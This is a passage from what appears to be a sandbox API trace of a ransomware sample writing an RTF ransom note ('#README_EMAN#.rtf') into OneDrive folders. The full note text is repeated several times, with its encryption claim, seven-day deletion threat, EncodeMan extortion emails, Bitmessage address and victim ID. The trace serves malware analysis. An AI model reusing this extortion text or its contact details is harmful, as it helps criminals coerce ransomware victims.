EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.667] WriteFile (in: hFile=0x2ec, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.670] CloseHandle (hObject=0x2ec) returned 1 [0298.670] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\#readme_eman#.rtf")) returned 0xffffffff [0298.670] GetLastError () returned 0x2 [0298.670] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your 